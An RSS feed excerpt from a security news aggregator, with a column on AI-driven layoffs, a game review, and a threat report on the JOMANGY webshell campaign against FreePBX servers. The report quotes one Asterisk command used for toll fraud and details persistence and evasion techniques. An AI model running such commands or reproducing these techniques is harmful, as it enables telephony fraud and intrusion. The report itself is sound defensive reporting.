<guid isPermaLink="true">https://tsecurity.de/de/3554937/it-security-nachrichten/surviving-a-lockbit-ransomware-attack-the-roi-of-visibility-upguard/</guid>
<pubDate>Thu, 28 May 2026 18:37:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Read how veteran CISO Nick Gicinto saved his alma mater from a LockBit ransomware attack by discarding the standard playbook.]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI tech job slaughter gets real]]></title>
<description><![CDATA[Tech companies seem to be falling over each other these days in firing people to either replace them with AI or to pay to build AI infrastructure. Wouldn’t it be nice if they at least waited until AI actually worked for business?



On the one hand, top tech businesses such as Amazon, Block, Cisc...]]></description>
<link>https://tsecurity.de/de/3550097/ai-nachrichten/the-ai-tech-job-slaughter-gets-real/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550097/ai-nachrichten/the-ai-tech-job-slaughter-gets-real/</guid>
<pubDate>Wed, 27 May 2026 09:03:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Tech companies seem to be falling over each other these days in firing people to either replace them with AI or to pay to build AI infrastructure. Wouldn’t it be nice if they at least waited until AI actually worked for business?</p>



<p>On the one hand, top tech businesses such as Amazon, Block, Cisco, Cloudflare, and Meta have all announced that they’re slashing payrolls — either because AI can do the same work as people or they need the cash to build out their AI infrastructure. Isn’t that great? All together, of the <a href="https://asia.nikkei.com/business/technology/artificial-intelligence/nearly-80-000-tech-jobs-cut-in-q1-but-ai-s-full-impact-may-be-yet-to-come" target="_blank" rel="noreferrer noopener">37,638 tech job cuts so far this year</a>, 47.9% — almost half —  can be tracked back to AI. </p>



<p>On the other hand, despite all the AI hype and hysteria, no one has yet proven that AI is, generally speaking, really all that helpful for businesses. Oh, I know, I know. You did great things with OpenClaw vibe programming. Microsoft’s CEO, Satya Nadella, claims <a href="https://www.cnbc.com/2025/04/29/satya-nadella-says-as-much-as-30percent-of-microsoft-code-is-written-by-ai.html" target="_blank" rel="noreferrer noopener">20% to 30% of the company’s code was written by AI</a>. And Nvidia assures us that 88% of its surveyed customers report AI has increased their revenues. </p>



<p>But really, what else would they say? “Dear Board, we just blew half a billion bucks on Nvidia GPUs, and we’re losing money hand over fist?” I don’t think so.</p>



<p>The truth is, as an IDC study reports, a mind-boggling <a href="https://www.cio.com/article/3850763/88-of-ai-pilots-fail-to-reach-production-but-thats-not-all-on-it.html" target="_blank">88% of proof-of-concept AI projects</a> never reach production. Lest we forget, <a href="https://mlq.ai/media/quarterly_decks/v0.1_State_of_AI_in_Business_2025_Report.pdf" target="_blank" rel="noreferrer noopener">MIT’s The GenAI Divide: State of AI in Business 2025 study</a> found that 95% of AI projects fail to deliver measurable P&amp;L impact. </p>



<p>Now, I have to acknowledge that AI is finally becoming truly helpful in business. As a guy who knows a thing or two about programming, Linus Torvalds, creator of Linux and Git, said at <a href="https://events.linuxfoundation.org/open-source-summit-north-america/" target="_blank" rel="noreferrer noopener">Open Source Summit North America</a>, “I’m personally 100% convinced that AI is changing programming.” He estimates that “<a href="https://www.zdnet.com/article/linus-torvalds-has-a-love-hate-relationship-with-ai/" target="_blank" rel="noreferrer noopener">AI will increase your productivity by a factor of 10.</a>” </p>



<p>But is that reason enough to slash make workforce cuts of between 10% to 40%? (Short answer: No. Longer answer: Noooo!)</p>



<p>It’s not just the mass firings. Workers who are either awaiting the axe, or have escaped it for the moment, are miserable. As one Meta employee told <em>The San Francisco Standard</em>, “<a href="https://sfstandard.com/pacific-standard-time/2026/05/15/meta-employee-gets-real-horror-working-right-now/">I tend to cry in the shower,</a>” and, “A lot of my feelings about my job are about the general chaos and not just the layoffs. ” </p>



<p>So, explain this to me: When everyone knows AI-driven layoffs are coming, exactly how well do you expect them to work? You really think they can give their best? </p>



<p>Making matters worse, it’s an open secret that IBM, Google, and Meta are <a href="https://www.nytimes.com/2026/05/08/technology/meta-ai-employees-miserable.html?unlocked_article_code=1.kFA.f6GX.u-tcjhX93xFC&amp;smid=url-share" target="_blank" rel="noreferrer noopener">having their employees train their AI replacements.</a> As a popular meme puts it, workers are now “building your own coffin.” Is it any wonder that a lot of people — 29% of all employees and 44% among Gen Z workers —  <a href="https://go.writer.com/ai-adoption-enterprise-2026" target="_blank" rel="noreferrer noopener">are deliberately sabotaging work</a> when the boss insists they train their AI replacements?</p>



<p>It also sure doesn’t help office morale when the CEO keeps saying AI will replace half of all employees. A particularly egregious example of this was when Standard Chartered CEO Bill Winters proclaimed his bank would slash thousands of jobs and <a href="https://www.wsj.com/finance/banking/ceo-walks-back-comment-about-replacing-lower-value-human-capital-with-ai-15bdfc5c?" target="_blank" rel="noreferrer noopener">replace “lower-value human capital” with AI.</a>  </p>



<p>He’s since backed off the claim, but come on — we all know he meant it. Just like all the other CEOs who’ve said similar things, between FOMO and the knowledge that AI job news is sure to make the stock price jump, they’re eager to cut headcounts and boast about how successful AI will make them. </p>



<p>What happens a few quarters down the road? Their attitude today seems to be let  tomorrow take care of tomorrow. I hate to tell them, but that really doesn’t work in the long run. (Not, mind you, that a future much farther ahead than the next quarter seems to matter much anymore to business executives.)</p>



<p>It should. As a recent Deloitte study stated: “Most respondents reported achieving <a href="https://www.deloitte.com/nl/en/issues/generative-ai/ai-roi-the-paradox-of-rising-investment-and-elusive-returns.html" target="_blank" rel="noreferrer noopener">satisfactory ROI on a typical AI use case within two to four years.</a> This is significantly longer than the typical payback period of 7seven to 12 months expected for technology investments. Only 6% reported payback in under a year, and even among the most successful projects, just 13% saw returns within 12 months.” </p>



<p>AI, in short, is not the miracle cure for what ails businesses that its fans claim. </p>



<p>Will that stop businesses? I doubt it. While I appreciate that California Gov., Gavin Newsom is trying to bandage the AI job bleedout by mandating studies on subsidizing companies to <a href="https://www.nytimes.com/2026/05/21/technology/newsom-ai-executive-order-california.html?unlocked_article_code=1.kFA.j4LN.krEJK5m_2bch&amp;smid=url-share" target="_blank" rel="noreferrer noopener">keep employees rather than replace them with AI</a>, I doubt that will do much to staunch the wound. </p>



<p>At the Open Source Summit North America, Linux Foundation CEO Jim Zemlin was optimistic about AI and jobs. He pointed out that, thanks to AI becoming  “pretty damn good coders,” the number of open-source projects on GitHub has led to a “surge of new code and projects.” </p>



<p>Zemlin also believes that while few developers will write code, “engineers will still design, review, secure, and integrate that code.” (He’s referring to what’s becoming  known as <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html" data-type="link" data-id="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">forward-deployed engineers</a>.) This, in turn, will supposedly lead to tech job growth. </p>



<p>I’d feel a lot better about that prediction if I believed the C-suite suits at most companies were capable of truly forward-looking thinking rather than focusing entirely on hiking the stock price by making the next quarter look good through staffing cuts. </p>



<p>In the long run, sure, AI will make us more productive. But, we’re not there yet. For now, companies need to keep employees happy, not shove AI down their throats — and work out carefully and thoughtfully how AI will really work for business. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Above the Snow Review (PC)]]></title>
<description><![CDATA[Creating a cozy resort in the middle of the mountains might sound fun, but it’s also one of the toughest things you will ever do in a game. Above the Snow clearly enforces that, since it brings the Frostpunk-like survival tension to a rather classic resort tycoon. Not only do you have to manage t...]]></description>
<link>https://tsecurity.de/de/3546960/it-security-nachrichten/above-the-snow-review-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546960/it-security-nachrichten/above-the-snow-review-pc/</guid>
<pubDate>Tue, 26 May 2026 07:52:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Creating a cozy resort in the middle of the mountains might sound fun, but it’s also one of the toughest things you will ever do in a game. Above the Snow clearly enforces that, since it brings the Frostpunk-like survival tension to a rather classic resort tycoon. Not only do you have to manage the resort and keep it going, but you also need to maintain various hikers alive, which can be the tricky part.

The game Above the Snow is all about surviving in a difficult setting, because having a shelter and resort deep in the mountains is not an easy feat. You have to carefully plan every action, but also manage supplies, and do everything you can based on how unpredictable the entire experience is. And that on its own will be incredibly difficult.

Above the Snow manages to combine management systems with various stories about the world. It’s not very difficult to learn what you have to do, since you take over a mountain lodge that was abandoned. Then, you fix it up and...]]></content:encoded>
</item>
<item>
<title><![CDATA[INJ3CTOR3 Deploys JOMANGY Webshell in Advanced FreePBX Attacks]]></title>
<description><![CDATA[Researchers at Cyble Research & Intelligence Labs (CRIL) have uncovered an advanced cyber campaign targeting FreePBX systems and, with high confidence, linked the activity to the threat actor INJ3CTOR3. The operation introduces a previously undocumented PHP webshell family named JOMANGY and deplo...]]></description>
<link>https://tsecurity.de/de/3538688/it-security-nachrichten/inj3ctor3-deploys-jomangy-webshell-in-advanced-freepbx-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3538688/it-security-nachrichten/inj3ctor3-deploys-jomangy-webshell-in-advanced-freepbx-attacks/</guid>
<pubDate>Fri, 22 May 2026 09:22:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1284" height="629" src="https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="INJ3CTOR3" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3.webp 1284w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-300x147.webp 300w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-1024x502.webp 1024w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-768x376.webp 768w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-600x294.webp 600w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-150x73.webp 150w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-750x367.webp 750w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-1140x558.webp 1140w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3.webp 1284w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-300x147.webp 300w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-1024x502.webp 1024w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-768x376.webp 768w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-600x294.webp 600w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-150x73.webp 150w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-750x367.webp 750w, https://thecyberexpress.com/wp-content/uploads/INJ3CTOR3-1140x558.webp 1140w" sizes="(max-width: 1284px) 100vw, 1284px" title="INJ3CTOR3 Deploys JOMANGY Webshell in Advanced FreePBX Attacks 1"></p><span data-contrast="auto">Researchers at Cyble Research &amp; Intelligence Labs (CRIL) have uncovered an advanced cyber campaign targeting FreePBX systems and, with high confidence, linked the activity to the threat actor INJ3CTOR3. The operation introduces a previously undocumented PHP webshell family named JOMANGY and deploys the ZenharR malware toolkit, which has previously been associated with the same actor.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Unlike conventional malware campaigns centered on ransomware or <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28385">data</a> theft, this operation is designed to hijack telephony infrastructure and abuse victims’ SIP trunks to generate fraudulent outbound calls billed directly to affected organizations. Researchers said the campaign demonstrates an unusually persistent architecture capable of surviving cleanup attempts and restoring infections within minutes.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">INJ3CTOR3 Builds a Self-Healing Persistence Framework</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">At the center of the operation is a multi-stage Bash-based infection chain that installs six separate persistence mechanisms across compromised FreePBX systems. These mechanisms continuously reinforce one another, creating what researchers described as a “self-healing” <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28390">malware</a> ecosystem.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The persistence channels include cron-based command-and-control polling every one to three minutes, shell profile injections triggered during reboots and root logins, immutable crontab backups protected with </span><span data-contrast="auto">chattr +i</span><span data-contrast="auto">, watchdog processes that automatically relaunch <a href="https://thecyberexpress.com/north-korean-hackers-deploy-drone-malware/" target="_blank" rel="noopener">malware components</a>, multiple immutable copies of JOMANGY webshells scattered across the server, and a self-reinstalling PHP executor embedded into the environment.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

[caption id="" align="alignnone" width="1024"]<img src="https://cyble.com/wp-content/uploads/2026/05/02-1024x238.png" alt="JOMANGY Webshell Operator Panel" width="1024" height="238"> Image source: Cyble[/caption]

<span data-contrast="auto">Researchers noted that partial remediation efforts are ineffective because any surviving component can rapidly rebuild the full compromise. Even if administrators remove several malicious files or cron jobs, remaining persistence layers can silently restore the infection.</span>
<h3 aria-level="2"><b><span data-contrast="none">Attackers Create 18 Backdoor Accounts Across FreePBX Systems</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The campaign also establishes extensive unauthorized access using 18 separate <a href="https://thecyberexpress.com/attackers-deploy-backdoors-in-ivanti-epmm/" target="_blank" rel="noopener">backdoor accounts</a> spread across multiple privilege levels. Nine of these accounts possess UID-0 privileges, effectively granting root-level access to the attackers.</span>

<span data-contrast="auto">Another eight accounts imitate legitimate service accounts commonly found in FreePBX systems, while one additional account is inserted directly into the FreePBX MySQL database to provide administrative web-panel access. To avoid suspicion, the attackers used names such as “asterisk,” “freepbxuser,” “spamfilter,” and “sangoma,” allowing the malicious accounts to blend into ordinary PBX administrative environments.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Researchers believe this approach significantly reduces the chances of casual detection during routine inspections.</span>
<h3 aria-level="2"><b><span data-contrast="none">JOMANGY Introduces a New PHP Webshell Family</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">CRIL researchers identified JOMANGY as a previously undocumented malware family, making this investigation the first publicly known analysis of the toolset. Every recovered sample used a double-obfuscation technique involving Base64 encoding layered over ROT13 transformations.</span>

<span data-contrast="auto">All identified payloads also contained the watermark string </span><span data-contrast="auto">trace_e1ebf9066a951be519a24140711839ea</span><span data-contrast="auto">, linking the malware samples to a common development source.</span>

<span data-contrast="auto">Beyond persistence and remote command execution, JOMANGY contains active toll <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28387">fraud</a> functionality capable of initiating outbound calls through compromised PBX infrastructure. Researchers observed commands such as:</span>

<span data-contrast="auto">asterisk -rx "channel originate Local/&lt;num&gt;@&lt;context&gt;"</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">This capability allows attackers to abuse victims’ telephony infrastructure directly for <a href="https://thecyberexpress.com/surge-mekotio-banking-trojan-latin-america/" target="_blank" rel="noopener">financial gain</a>.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Large-Scale Reconnaissance Suggests Mass Exploitation</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Researchers also discovered a command-and-control-hosted inventory file named </span><span data-contrast="auto">people2.txt</span><span data-contrast="auto"> containing 3,080 <a href="https://thecyberexpress.com/russia-weaponizes-ukrainian-ip-addresses/" target="_blank" rel="noopener">IP addresses</a> believed to represent automated reconnaissance results.</span>

<span data-contrast="auto">Approximately 39 percent of the listed systems were hosted on Alibaba Cloud infrastructure located in China, Hong Kong, and Singapore, suggesting a geographically broad scanning operation. The findings indicate that INJ3CTOR3 is pursuing mass exploitation rather than highly selective targeting.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Additional evidence recovered from stolen Elastix databases and references to Issabel and Sangoma environments suggests the campaign targets a wide range of PBX deployments across Latin America, Southeast Asia, and the Middle East.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Infrastructure Overlaps Tie the Campaign to INJ3CTOR3</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The malware infrastructure demonstrated strong operational continuity with earlier INJ3CTOR3 campaigns. The Stage 1 dropper aggressively removed competing malware families and defensive tooling before deploying its own payloads.</span>

<span data-contrast="auto">Researchers found that more than 50 webshell signatures were deleted from infected systems, while <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-firewall/" target="_blank" rel="noopener" title="firewall" data-wpil-keyword-link="linked" data-wpil-monitor-id="28388">firewall</a> rules blocked 11 rival command-and-control IP addresses.</span>

<span data-contrast="auto">Interestingly, the malware also removed artifacts associated with the actor’s own January 2026 campaign. Researchers believe this indicates that the operators migrated infrastructure from Brazilian-hosted systems to Dutch-hosted servers while attempting to erase remnants of older compromises.</span>

<span data-contrast="auto">Attribution to INJ3CTOR3 is supported by several overlapping indicators. Researchers identified the marker string </span><span data-contrast="auto">bm2cjjnRXac1WW3KT7k6MKTR</span><span data-contrast="auto">, previously documented by Fortinet during analysis of the encystPHP campaign in January 2026.</span>

[caption id="" align="alignnone" width="1024"]<img src="https://cyble.com/wp-content/uploads/2026/05/06-1024x278.png" alt="Disable Endpoint Module (EncystPHP)" width="1024" height="278"> Source: Cyble[/caption]

<span data-contrast="auto">Additional overlaps involving command-and-control infrastructure, file paths, credential implantation patterns, and binary names matched prior reporting from Palo Alto Networks Unit 42, Check Point Research, and SANS <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="Internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28392">Internet</a> Storm Center.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Stage 1 Establishes Initial Control and Persistence</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The infection chain unfolds in multiple stages. Stage 1 begins with a large Bash dropper that removes competing implants, creates unauthorized accounts, deploys persistence mechanisms, and wipes evidence from system logs.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The malware modifies </span><span data-contrast="auto">.bash_profile</span><span data-contrast="auto">, </span><span data-contrast="auto">.bashrc</span><span data-contrast="auto">, and </span><span data-contrast="auto">/etc/rc.local</span><span data-contrast="auto"> to ensure execution during reboots and root logins. It also installs recurring cron jobs that continuously retrieve additional payloads from the command-and-control infrastructure.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Researchers said the malware additionally creates immutable crontab backups and deploys watchdog processes capable of restoring deleted components automatically.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Stage 2 Deploys JOMANGY Across Legitimate FreePBX Directories</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Stage 2 is delivered through </span><span data-contrast="auto">k.php</span><span data-contrast="auto">, which introduces the JOMANGY webshell family into compromised FreePBX systems.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The <a href="https://thecyberexpress.com/malicious-actors-macropack-red-team-payloads/" target="_blank" rel="noopener">payload</a> first re-executes portions of Stage 1 to reinforce persistence before writing obfuscated PHP backdoors into legitimate FreePBX web directories. One major target is </span><span data-contrast="auto">/var/www/html/admin/views/ajax.php</span><span data-contrast="auto">, a legitimate administrative file frequently accessed in FreePBX environments.</span>

<span data-contrast="auto">Additional JOMANGY copies are deployed into locations such as </span><span data-contrast="auto">rest_phones/ajax.php</span><span data-contrast="auto">, </span><span data-contrast="auto">admin/modules/h/</span><span data-contrast="auto">, and several PBX management directories. The attackers also implement </span><span data-contrast="auto">.htaccess</span><span data-contrast="auto"> rewrite rules that redirect arbitrary requests toward hidden webshell copies, improving accessibility and survivability.</span>

<span data-contrast="auto">Researchers observed that </span><span data-contrast="auto">k.php</span><span data-contrast="auto"> actively reinstalls malicious MySQL backdoor accounts whenever the payload executes, ensuring administrative access is recreated even if defenders remove <a href="https://thecyberexpress.com/chatgpt-hacked-compromised-accounts-dark-web/" target="_blank" rel="noopener">compromised accounts</a>.</span>
<h3 aria-level="2"><b><span data-contrast="none">Possible Exploitation Paths Remain Under Investigation</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Researchers could not conclusively identify the initial exploitation vector because relevant web logs and <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="28389">exploit</a> payloads were unavailable during analysis. However, two <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28384">vulnerabilities</a> emerged as likely candidates.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The first is CVE-2025-64328, a post-authentication command injection flaw affecting the FreePBX filestore module. The <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28386">vulnerability</a> had previously been exploited during earlier INJ3CTOR3 operations.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The second is CVE-2025-57819, a pre-authentication <a href="https://thecyberexpress.com/sql-injection-in-fortra-filecatalyst-workflow/" target="_blank" rel="noopener">SQL injection vulnerability</a> in the FreePBX Endpoint module capable of inserting malicious cron jobs into the scheduler.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">CRIL researchers believe CVE-2025-57819 may be particularly relevant because the campaign’s persistence architecture closely mirrors the scheduling abuse associated with the flaw. Earlier malware variants reportedly disabled the Endpoint module after exploitation, while the latest campaign leaves it active.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">ZenharR Malware Toolkit Expands the Infection</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Stage 3 of the campaign is delivered through </span><span data-contrast="auto">wr.php</span><span data-contrast="auto">, a Bash-based dropper associated with the ZenharR malware toolkit.</span>

<span data-contrast="auto">Like earlier stages, the payload reruns portions of the infection chain before deploying additional malware components. ZenharR webshells are written into key FreePBX directories, including </span><span data-contrast="auto">/var/www/html/digium_phones/ajax.php</span><span data-contrast="auto"> and </span><span data-contrast="auto">/var/www/html/admin/views/some.php</span><span data-contrast="auto">.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">However, researchers noted that the propagation logic also replicated the already-installed JOMANGY webshell into 15 additional locations across the <a href="https://thecyberexpress.com/cve-2025-65606-totolink-ex200-firmware/" target="_blank" rel="noopener">web root</a>. As a result, both JOMANGY and the ZenharR malware toolkit operate side by side on infected systems.</span>

<span data-contrast="auto">Another payload named </span><span data-contrast="auto">wor.php</span><span data-contrast="auto"> was also discovered on the command-and-control server, although researchers could not identify an active trigger mechanism during analysis.</span>
<h3 aria-level="2"><b><span data-contrast="none">license.php Functions as a Privileged Persistence Mechanism</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The </span><span data-contrast="auto">license.php</span><span data-contrast="auto"> component acts as a highly privileged PHP command executor embedded within the FreePBX HA infrastructure.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Unlike browser-accessible JOMANGY and ZenharR webshells, </span><span data-contrast="auto">license.php</span><span data-contrast="auto"> contains no authentication controls and relies on remotely supplied format-string placeholders before activation.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Once triggered, the component enables arbitrary command execution with elevated privileges. <a href="https://cyble.com/blog/jomangy-inj3ctor3s-self-healing-freepbx-toll-fraud-campaign/" target="_blank" rel="nofollow noopener">Researchers observed</a> that it could delete competing accounts, reset passwords for service users and even the root account, promote accounts to UID-0 privileges, modify SSH settings to preserve root access, and install dual-track cron persistence for both </span><span data-contrast="auto">k.php</span><span data-contrast="auto"> and </span><span data-contrast="auto">wr.php</span><span data-contrast="auto">.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The malware also repeatedly scrubbed Apache logs and communicated with </span><span data-contrast="auto">root.php</span><span data-contrast="auto"> on the command-and-control infrastructure.</span>
<h3 aria-level="2"><b><span data-contrast="none">Obfuscation and Evasion Techniques Reduce Detection Rates</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The campaign’s evasion methods were carefully optimized rather than excessively complex. In Stage 1, Base64 encoding was selectively applied only to highly suspicious commands, including </span><span data-contrast="auto">useradd</span><span data-contrast="auto"> instructions responsible for creating UID-0 accounts.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

[caption id="" align="alignnone" width="919"]<img src="https://cyble.com/wp-content/uploads/2026/05/16.png" alt="JOMANGY base64 decoded rot13 output" width="919" height="989"> Source: Cyble[/caption]

<span data-contrast="auto">Cron payloads were hidden inside encoded variables, causing malicious crontab entries to appear relatively benign during casual inspection.</span>

<span data-contrast="auto">JOMANGY’s double-obfuscation design represents a notable evolution over earlier malware associated with INJ3CTOR3. Many automated analysis tools decode only the outer Base64 layer, leaving unreadable ROT13 output rather than functional PHP code.</span>

[caption id="" align="alignnone" width="1024"]<img src="https://cyble.com/wp-content/uploads/2026/05/17-1024x496.png" alt="STAGE 1 dropper detections" width="1024" height="496"> Source: Cyble[/caption]

<span data-contrast="auto">Combined with dead-code anti-analysis logic, these techniques contributed to extremely low antivirus detection rates. Researchers reported that both </span><span data-contrast="auto">k.php</span><span data-contrast="auto"> and </span><span data-contrast="auto">wr.php</span><span data-contrast="auto"> showed zero detections on VirusTotal during analysis, while the Stage 1 dropper was detected by only four out of 76 <a href="https://thecyberexpress.com/miningdropper-android-malware/" target="_blank" rel="noopener">antivirus engines</a>.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">VoIP Toll Fraud Continues to Grow Globally</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The broader implications of the campaign are substantial. Industry estimates place global telecom fraud losses at more than $41 billion annually, with VoIP toll fraud representing a major segment of the underground economy.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

